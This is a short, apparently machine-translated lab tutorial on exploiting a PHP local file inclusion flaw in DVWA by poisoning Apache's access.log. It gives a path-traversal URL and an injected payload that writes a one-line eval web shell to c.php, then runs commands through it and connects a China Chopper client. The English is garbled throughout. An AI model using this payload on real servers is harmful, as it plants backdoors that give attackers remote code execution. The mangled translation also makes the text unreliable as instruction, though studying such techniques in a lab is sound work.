Log File Vulnerability principle
when there is a local file inclusion vulnerability in PHP, but can not upload files properly, which means that there could not contain loopholes exploited at all, then the attacker could be exploited apache log files to the invasion.
After running the Apache server generates two log files, these two files are access.log (access logs) and error.log (error logs), under the apache log file records of our operation, and writes access log filesaccess.login
E.g:http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=../../../../Apache-20\logs\access.log
lab environment:
- PHPstudy
- DVWA Range
- Burp Suite capture software | Download | Tutorial |
- kitchen knife
Environment configuration:
Open the Apache configuration file
Search CustomLog "logs/access.log" commonthe previous comment removed, and then restart PHPstudy
Simulation:
1, in the current Web page capture
2, is sent to Repeatermodule
3, change the url <?php $file = fopen('c.php','w');fputs($file,'<?php @eval($_REQUEST[666]);?>')?>and then click GO
4, access C:\\phpStudy\\PHPTutorial\\Apache\\logs\\access.logpaths, following the successful implementation of FIG.
5, in ficase the input c.php?666=phpinfo();successfully executed
6, the use of choppers connected copy url
